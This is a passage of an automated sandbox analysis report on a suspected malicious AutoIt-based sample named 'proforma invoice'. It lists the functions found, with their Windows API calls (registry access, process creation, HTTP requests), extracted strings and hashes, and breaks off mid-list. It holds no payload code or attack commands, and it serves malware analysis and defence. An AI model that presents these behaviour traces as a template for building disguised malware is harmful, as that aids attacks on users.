                  Similarity
                  • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                  • API String ID: 9721498-966354055
                  • Opcode ID: 8136c3eb651b8de4711d4108d3fd2870d847eee1c734cf4112f307a6c3c61af5
                  • Instruction ID: 1a4dbdb51c90855f2069d9a0fd21cc94dfd9595b7bafd2d53065c8e3765e5fb2
                  • Opcode Fuzzy Hash: 8136c3eb651b8de4711d4108d3fd2870d847eee1c734cf4112f307a6c3c61af5
                  • Instruction Fuzzy Hash: C41278356042119FDB14EF14D991E2EBBE5EF89714F14889CF88A9B3A2DB31ED41CB81
                  Function 00B3091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                  Download Yara Rule
                  APIs
                  • CharUpperBuffW.USER32(?,?), ref: 00B309C6
                  • _wcslen.LIBCMT ref: 00B30A01
                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B30A54
                  • _wcslen.LIBCMT ref: 00B30A8A
                  • _wcslen.LIBCMT ref: 00B30B06
                  • _wcslen.LIBCMT ref: 00B30B81
                    • Part of subcall function 00ABF9F2: _wcslen.LIBCMT ref: 00ABF9FD
                    • Part of subcall function 00B02BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B02BFA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$MessageSend$BuffCharUpper
                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                  • API String ID: 1103490817-4258414348
                  • Opcode ID: 517c781cf118395427ac96ab8dffb7335f5ea317bb7e007d751fa46cfa4d73c6
                  • Instruction ID: 223c2041871d91c53dbc0e987ddcfc94b269ecd9ff45a1bf41b3d5ee708cabf2
                  • Opcode Fuzzy Hash: 517c781cf118395427ac96ab8dffb7335f5ea317bb7e007d751fa46cfa4d73c6
                  • Instruction Fuzzy Hash: CFE19E352183019FC714EF24C5A096AB7E1FF99714F2489ACF8969B3A2DB31ED45CB81
                  Function 00B2C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$BuffCharUpper
                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                  • API String ID: 1256254125-909552448
                  • Opcode ID: 79e3de7ea057186b5b56dd668669cb8998a435ba4a065050321b7abd2a631523
                  • Instruction ID: 79e1a1e8ef10d396728ac4626a540eac3ad9546544b83b75be4aa1ed6b820797
                  • Opcode Fuzzy Hash: 79e3de7ea057186b5b56dd668669cb8998a435ba4a065050321b7abd2a631523
                  • Instruction Fuzzy Hash: 4971143360013A8BCB20DE7CED515BE3BD1EF65754B2505A8F86E97288EA35CD4583A0
                  Function 00B3833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                  Download Yara Rule
                  APIs
                  • _wcslen.LIBCMT ref: 00B3835A
                  • _wcslen.LIBCMT ref: 00B3836E
                  • _wcslen.LIBCMT ref: 00B38391
                  • _wcslen.LIBCMT ref: 00B383B4
                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B383F2
                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00B3361A,?), ref: 00B3844E
                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B38487
                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B384CA
                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B38501
                  • FreeLibrary.KERNEL32(?), ref: 00B3850D
                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B3851D
                  • DestroyIcon.USER32(?), ref: 00B3852C
                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B38549
                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B38555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                  • String ID: .dll$.exe$.icl
                  • API String ID: 799131459-1154884017
                  • Opcode ID: 09340dcf26eddd2cb59835af932ef2413c64fb7faee89553634e0f066b1bbce1
                  • Instruction ID: dfffb13f4189ad98b1e1a2abc5ae5a877a2663d978d20cfab76abba7aafa3e8b
                  • Opcode Fuzzy Hash: 09340dcf26eddd2cb59835af932ef2413c64fb7faee89553634e0f066b1bbce1
                  • Instruction Fuzzy Hash: FF61B071540315BAEB14DF64CC85BBE7BA8FB18B11F204689F815E61D1DF74A984CBA0
                  Function 00AA7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                  • API String ID: 0-1645009161
                  • Opcode ID: 71babf912802ee9e1b312e72ed1659cb45ef0994f7f80933edd7a967dcdd1766
                  • Instruction ID: 8dbea50abb69914d29e20ed40b8853977e1cc17df4de729d1b759e88f74a9a81
                  • Opcode Fuzzy Hash: 71babf912802ee9e1b312e72ed1659cb45ef0994f7f80933edd7a967dcdd1766
                  • Instruction Fuzzy Hash: 5E81E071A04605BBDB20BF61DD42FBF3BA8AF16300F144068F905AB1E2EB74DA51D7A1
                  Function 00B05A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                  Download Yara Rule
                  APIs
                  • LoadIconW.USER32(00000063), ref: 00B05A2E
                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B05A40
                  • SetWindowTextW.USER32(?,?), ref: 00B05A57
                  • GetDlgItem.USER32(?,000003EA), ref: 00B05A6C
                  • SetWindowTextW.USER32(00000000,?), ref: 00B05A72
                  • GetDlgItem.USER32(?,000003E9), ref: 00B05A82
                  • SetWindowTextW.USER32(00000000,?), ref: 00B05A88
                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B05AA9
                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B05AC3
                  • GetWindowRect.USER32(?,?), ref: 00B05ACC
                  • _wcslen.LIBCMT ref: 00B05B33
                  • SetWindowTextW.USER32(?,?), ref: 00B05B6F
                  • GetDesktopWindow.USER32 ref: 00B05B75
                  • GetWindowRect.USER32(00000000), ref: 00B05B7C
                  • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00B05BD3
                  • GetClientRect.USER32(?,?), ref: 00B05BE0
                  • PostMessageW.USER32(?,00000005,00000000,?), ref: 00B05C05
                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B05C2F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                  • String ID:
                  • API String ID: 895679908-0
                  • Opcode ID: b2d45f339abeae7d27845a061069970e28eef44f9a7b4d3da57a7d986c9b0d40
                  • Instruction ID: 55e0f34dcd3ec3d68e8cb1b7528f755a139f81548483d271a8adf626d2bec9e2
                  • Opcode Fuzzy Hash: b2d45f339abeae7d27845a061069970e28eef44f9a7b4d3da57a7d986c9b0d40
                  • Instruction Fuzzy Hash: 1A712B31A00A09AFDB20DFA8CE85AAFBFF5FB48704F104558E546A39A0DB75A944CF50
                  Function 00AC00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                  Download Yara Rule
                  APIs
                  • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00AC00C6
                    • Part of subcall function 00AC00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00B7070C,00000FA0,42AEFFA0,?,?,?,?,00AE23B3,000000FF), ref: 00AC011C
                    • Part of subcall function 00AC00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00AE23B3,000000FF), ref: 00AC0127
                    • Part of subcall function 00AC00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00AE23B3,000000FF), ref: 00AC0138
                    • Part of subcall function 00AC00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00AC014E
                    • Part of subcall function 00AC00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00AC015C
                    • Part of subcall function 00AC00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00AC016A
                    • Part of subcall function 00AC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00AC0195
                    • Part of subcall function 00AC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00AC01A0
                  • ___scrt_fastfail.LIBCMT ref: 00AC00E7
                    • Part of subcall function 00AC00A3: __onexit.LIBCMT ref: 00AC00A9
                  Strings
                  • InitializeConditionVariable, xrefs: 00AC0148
                  • kernel32.dll, xrefs: 00AC0133
                  • SleepConditionVariableCS, xrefs: 00AC0154
                  • WakeAllConditionVariable, xrefs: 00AC0162
                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00AC0122
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                  • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                  • API String ID: 66158676-1714406822
                  • Opcode ID: 1bbcc0dddaee409825f7902dcbe6d59c1b8750ccc0e2ba66051c94a336f1eddf
                  • Instruction ID: 3880327048e2ebea9f22216e6ad0ffcf3baa7dba3986164c54bb48260e8a4762
                  • Opcode Fuzzy Hash: 1bbcc0dddaee409825f7902dcbe6d59c1b8750ccc0e2ba66051c94a336f1eddf
                  • Instruction Fuzzy Hash: DC21A732A44711EBD7116BA4AD09F7E77E8EB05B51F26063EF815B72A1DFB49C008B90
                  Function 00B030F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen
                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                  • API String ID: 176396367-1603158881
                  • Opcode ID: 3304d2ec3669d875fce7249e1a0e438f22c86789875a23589470944de72796ad
                  • Instruction ID: ed097928b575314d7df5907ebfa460d98f3720301f5d6b45491e59897201bcae
                  • Opcode Fuzzy Hash: 3304d2ec3669d875fce7249e1a0e438f22c86789875a23589470944de72796ad
                  • Instruction Fuzzy Hash: DBE1F532A005169BCB24DF64C899BEEBFF8FF54B10F548199E456B72D0DB30AE858790
                  Function 00B144C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                  Download Yara Rule
                  APIs
                  • CharLowerBuffW.USER32(00000000,00000000,00B3CC08), ref: 00B14527
                  • _wcslen.LIBCMT ref: 00B1453B
                  • _wcslen.LIBCMT ref: 00B14599
                  • _wcslen.LIBCMT ref: 00B145F4
                  • _wcslen.LIBCMT ref: 00B1463F
                  • _wcslen.LIBCMT ref: 00B146A7
                    • Part of subcall function 00ABF9F2: _wcslen.LIBCMT ref: 00ABF9FD
                  • GetDriveTypeW.KERNEL32(?,00B66BF0,00000061), ref: 00B14743
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$BuffCharDriveLowerType
                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                  • API String ID: 2055661098-1000479233
                  • Opcode ID: 7fdde14c8a9eb356641981b2ccb4df47b67447d2c4a5e150859b724f95434336
                  • Instruction ID: d89c382d928050e8b52ef93eb7a63cc2c8ef6a6611395bba3f80d18af6e703e6
                  • Opcode Fuzzy Hash: 7fdde14c8a9eb356641981b2ccb4df47b67447d2c4a5e150859b724f95434336
                  • Instruction Fuzzy Hash: 31B1F1316083029FC710DF28C991AAEB7E5EFA6764F94499DF496C7291D730DC84CBA2
                  Function 00B2AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                  Download Yara Rule
                  APIs
                  • _wcslen.LIBCMT ref: 00B2B198
                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B2B1B0
                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B2B1D4
                  • _wcslen.LIBCMT ref: 00B2B200
                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B2B214
                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B2B236
                  • _wcslen.LIBCMT ref: 00B2B332
                    • Part of subcall function 00B105A7: GetStdHandle.KERNEL32(000000F6), ref: 00B105C6
                  • _wcslen.LIBCMT ref: 00B2B34B
                  • _wcslen.LIBCMT ref: 00B2B366
                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B2B3B6
                  • GetLastError.KERNEL32(00000000), ref: 00B2B407
                  • CloseHandle.KERNEL32(?), ref: 00B2B439
                  • CloseHandle.KERNEL32(00000000), ref: 00B2B44A
                  • CloseHandle.KERNEL32(00000000), ref: 00B2B45C
                  • CloseHandle.KERNEL32(00000000), ref: 00B2B46E
                  • CloseHandle.KERNEL32(?), ref: 00B2B4E3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                  • String ID:
                  • API String ID: 2178637699-0
                  • Opcode ID: 66125e9bda8ee0e0812001bd7f4aaa385f97adc92776e54349372405e35453c3
                  • Instruction ID: 7bb0d90baac72f899d86f1c56d07e021cd3dc3e932dbd2bc492e1bceb44c5645
                  • Opcode Fuzzy Hash: 66125e9bda8ee0e0812001bd7f4aaa385f97adc92776e54349372405e35453c3
                  • Instruction Fuzzy Hash: 46F169315043109FCB15EF24D991B6EBBE5EF85314F18899DF8999B2A2DB31EC40CB52
                  Function 00AA326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetMenuItemCount.USER32(00B71990), ref: 00AE2F8D
                  • GetMenuItemCount.USER32(00B71990), ref: 00AE303D
                  • GetCursorPos.USER32(?), ref: 00AE3081
                  • SetForegroundWindow.USER32(00000000), ref: 00AE308A
                  • TrackPopupMenuEx.USER32(00B71990,00000000,?,00000000,00000000,00000000), ref: 00AE309D
                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00AE30A9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                  • String ID: 0
                  • API String ID: 36266755-4108050209
                  • Opcode ID: 53c636a7106255b1649bdd638409ccdeed1321de92df765a09bdb956e4c14962
                  • Instruction ID: d874314966aa69529ed1ed9fde3d7ee3c27e2e8a13a025e3f45928f66591bd03
                  • Opcode Fuzzy Hash: 53c636a7106255b1649bdd638409ccdeed1321de92df765a09bdb956e4c14962
                  • Instruction Fuzzy Hash: 73710631640255BEEB259F69CC49FAABF78FF05324F204216F5156B1E0CBB1AD64CB90
                  Function 00B36CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                  Download Yara Rule
                  APIs
                  • DestroyWindow.USER32(?,?), ref: 00B36DEB
                    • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B36E5F
                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B36E81
                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B36E94
                  • DestroyWindow.USER32(?), ref: 00B36EB5
                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AA0000,00000000), ref: 00B36EE4
                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B36EFD
                  • GetDesktopWindow.USER32 ref: 00B36F16
                  • GetWindowRect.USER32(00000000), ref: 00B36F1D
                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B36F35
                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B36F4D
                    • Part of subcall function 00AB9944: GetWindowLongW.USER32(?,000000EB), ref: 00AB9952
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                  • String ID: 0$tooltips_class32
                  • API String ID: 2429346358-3619404913
                  • Opcode ID: e7861b2365d6f6b7966be562d362c2d5b3c1828061f89bf1fe8bfa479ff60593
                  • Instruction ID: 23d329f0bf3936f2e9353836023f19859ba634ebdf3f3ed0c3463d5e82146b74
                  • Opcode Fuzzy Hash: e7861b2365d6f6b7966be562d362c2d5b3c1828061f89bf1fe8bfa479ff60593
                  • Instruction Fuzzy Hash: C1716974144244AFDB21CF18DC44FAABBE9FB89304F24485DFA9997261CB70A94ACB21
                  Function 00B3911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                  • DragQueryPoint.SHELL32(?,?), ref: 00B39147
                    • Part of subcall function 00B37674: ClientToScreen.USER32(?,?), ref: 00B3769A
                    • Part of subcall function 00B37674: GetWindowRect.USER32(?,?), ref: 00B37710
                    • Part of subcall function 00B37674: PtInRect.USER32(?,?,00B38B89), ref: 00B37720
                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00B391B0
                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B391BB
                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B391DE
                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B39225
                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00B3923E
                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00B39255
                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00B39277
                  • DragFinish.SHELL32(?), ref: 00B3927E
                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B39371
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                  • API String ID: 221274066-3440237614
                  • Opcode ID: 81f72e75f5f3d484438bfe3116d9d4603f6f209606aae2a865cb6454c95880f0
                  • Instruction ID: 3cc201f291b4bc4e08255ece6cac06a3900c96fdf1379a679e24b4e154aae94b
                  • Opcode Fuzzy Hash: 81f72e75f5f3d484438bfe3116d9d4603f6f209606aae2a865cb6454c95880f0
                  • Instruction Fuzzy Hash: 77618B71108301AFD701EFA4CD85DAFBBE8EF89750F10495DF595932A0DB709A49CB62
                  Function 00B1C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                  Download Yara Rule
                  APIs
                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B1C4B0
                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B1C4C3
                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B1C4D7
                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B1C4F0
                  • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00B1C533
                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B1C549
                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B1C554
                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B1C584
                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B1C5DC
                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B1C5F0
